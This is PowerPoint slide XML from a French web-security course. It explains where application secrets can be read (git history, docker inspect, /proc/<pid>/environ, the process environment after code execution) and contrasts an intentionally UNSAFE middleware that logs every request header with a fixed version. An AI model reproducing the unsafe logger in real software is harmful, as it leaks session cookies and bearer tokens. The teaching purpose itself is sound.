          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="2286000"/>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git clone, Ctrl+F. Un script kiddie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2724912"/>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8  .env commité « une fois »</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="2724912"/>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git log -p. L’historique ne ment pas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3163824"/>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7  code malveillant dans l’app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="3163824"/>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os.environ / getenv. RCE, plugin, note PHP : le process lit l’env.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3602736"/>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5  Docker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="3602736"/>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compose.yml, docker inspect, l’image. Un cran au-dessus du repo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="4041648"/>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3  le serveur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="4041648"/>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SSH, systemd, /proc/PID/environ. Il faut la boîte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="4480560"/>
            <a:ext cx="5669280" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1  coffre + rotation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949440" y="4480560"/>
            <a:ext cx="2194560" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vault, secrets manager. Le process lit encore. Un RCE reste un 7.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4937760"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.env écarte le repo public et le stagiaire curieux. Pas quelqu’un déjà dans le process.</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03 · secrets</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Les quatre crans, sans jargon</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RCE  ·  7</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Remote Code Execution : du code à vous, dans VOTRE process. include PHP, dépendance pourrie, eval. getenv() est une fonction. Le .env est déjà chargé.</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Docker  ·  5</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environment: dans le compose, docker inspect, parfois cuit dans l’image. Il faut la machine Docker, pas seulement le repo. Un cran.</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Le serveur, le PID  ·  3</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Linux : /proc/&lt;pid&gt;/environ. systemd, le shell du deploy. Il faut SSH, ou un root. La boîte, pas le GitHub.</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Vault / secrets manager  ·  1</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HashiCorp, AWS, GCP. Rotation, audit, pas dans git, pas dans l’image. L’app le lit quand même en mémoire. Un RCE reste un 7.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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Chaque cran écarte un public. Aucun n’arrête quelqu’un déjà dans le process.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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s3_03_logging</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Journalisation dangereuse. Authorization compris.</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day-3/s3_03_logging. Le tableau prévient. Network montre Bearer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On dump les headers pour la traçabilité. Voyez le fichier, page suivante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s3-logging-devtools.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1591056"/>
            <a:ext cx="10149840" cy="3624362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5270282"/>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Authorization: Bearer … dans les traces. Pas seulement Cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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logs.unsafe.txt</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Le fichier a tout. Le jeton aussi.</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logs/logs.unsafe.txt. Ctrl+F Authorization. Chaque requête, une copie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d3s3-logs-unsafe.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1591056"/>
            <a:ext cx="10149840" cy="2561549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4207469"/>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Un log, un APM, un Discord. Le porteur, c’est n’importe qui.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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5989320" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>03 · logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="5989320" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un logger qui dump les headers. Tranquille ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>
            <a:ext cx="598932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517904"/>
            <a:ext cx="5989320" cy="1417320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La route UNSAFE log les headers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On s’est dit : l’auth est toujours dans un cookie. Donc dumper les headers, c’est de la belle traçabilité.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3099816"/>
            <a:ext cx="73152" cy="2569464"/>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1078992" y="3099816"/>
            <a:ext cx="5989320" cy="2569464"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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371600" y="3227832"/>
            <a:ext cx="5532120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le body est propre. Et alors ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3557016"/>
            <a:ext cx="5532120" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie est un header. Vous venez de copier la session dans le fichier de traces.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="wojak-potato.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7702219" y="1371600"/>
            <a:ext cx="3203600" cy="4160520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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logging</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La route UNSAFE. Elle dump tout.</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UNSAFE  ·  console.log(req.headers)</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app.use((req, res, next) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  console.log(req.method, req.url);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  console.log(req.headers);   // tout. Cookie compris.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  next();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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La belle traçabilité. Page suivante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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logging</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Not quite.</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Ce que le dump contient vraiment</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Cookie: s4_session=abc123...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Authorization: Bearer eyJhbGciOiJ...</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Logger l’user, pas le secret</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log.info("auth user=%s", user.id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># pas req.headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># pas Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># pas Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Le header Cookie EST la session. Un log, un APM, un Discord : le porteur, c’est n’importe qui.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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159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Authorization</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Quand le JS doit coller les credentials</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Approche usuelle  ·  header Authorization</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fetch("/api/notes", {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  headers: { Authorization: `Bearer ${token}` },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Cookie : le navigateur le colle tout seul (HttpOnly). Authorization : un programme le met — le JS du front, ou une API qui en appelle une autre.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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Bearer</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Le mot Bearer. Magique ?</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Express  ·  une string, un split</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const raw = req.get("authorization") || "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const [scheme, token] = raw.split(" ");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if (scheme !== "Bearer" || !token) return res.sendStatus(401);</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Flask  ·  pareil</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auth = request.headers.get("Authorization", "")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>scheme, _, token = auth.partition(" ")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if scheme != "Bearer" or not token:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    abort(401)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="12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Bearer n’est pas parsé par Express ni Flask. C’est une étiquette (RFC 6750). Vous lisez une chaîne. Le mot sert à parler le même langage que les libs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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03 · bearer ≠ JWT</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Deux étages. On les mélange tout le temps.</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Bearer</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Comment on PRÉSENTE le jeton. Un schéma HTTP. Authorization: Bearer …</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JWT</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Comment le jeton est FABRIQUÉ. Trois blobs Base64, signés. On l’a vu ce matin.</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Ensemble, souvent</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Authorization: Bearer &lt;un JWT&gt;. L’enveloppe, et le papier dedans.</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Pas forcément ensemble</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JWT dans un cookie : JWT, pas Bearer. Bearer opaque (un id de session) : Bearer, pas JWT.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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Bearer = le mode de transport. JWT = le format. Ni l’un ni l’autre n’est l’autorisation sur /notes/203.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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03 · bearer</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Qui colle le jeton ?</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Navigateur + cookie</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navigateur envoie Cookie tout seul. HttpOnly : JS ne le voit pas. Un utilisateur derrière un onglet.</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Navigateur + Bearer</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Votre JS doit recoller Authorization à chaque fetch. Donc JS détient la chaîne. XSS la lit.</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API → API</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Pas de navigateur. Personne n’injecte de cookie pour vous. Authorization: Bearer est le bon outil.</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Mémoire, côté SPA</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Variable JS : un F5 oublie. localStorage : survit, XSS lit. Seulement si c’est le front qui appelle.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="42245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Cookie = un humain dans un navigateur. Bearer = un programme qui appelle. Deux jobs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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03 · headers</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Cinq headers, un middleware</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Strict-Transport-Security</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navigateur se souvient : ce site est HTTPS. Le prochain http:// est forcé en https. Hôtel wifi, jour 1.</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X-Content-Type-Options: nosniff</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Le navigateur ne devine plus le type. Un fichier servi en text/plain ne devient pas du JS parce qu’il y ressemble.</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Referrer-Policy</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Sans ça, le site suivant voit l’URL d’où vous venez. /reset?token=… fuit. no-referrer : on ne dit rien.</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Content-Security-Policy</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Quels scripts ont le droit de tourner. default-src ’self’ : pas le CDN du voisin, pas un XSS collé dans la page. Un filet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4206240"/>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 y="4206240"/>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325880" y="4242816"/>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Permissions-Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
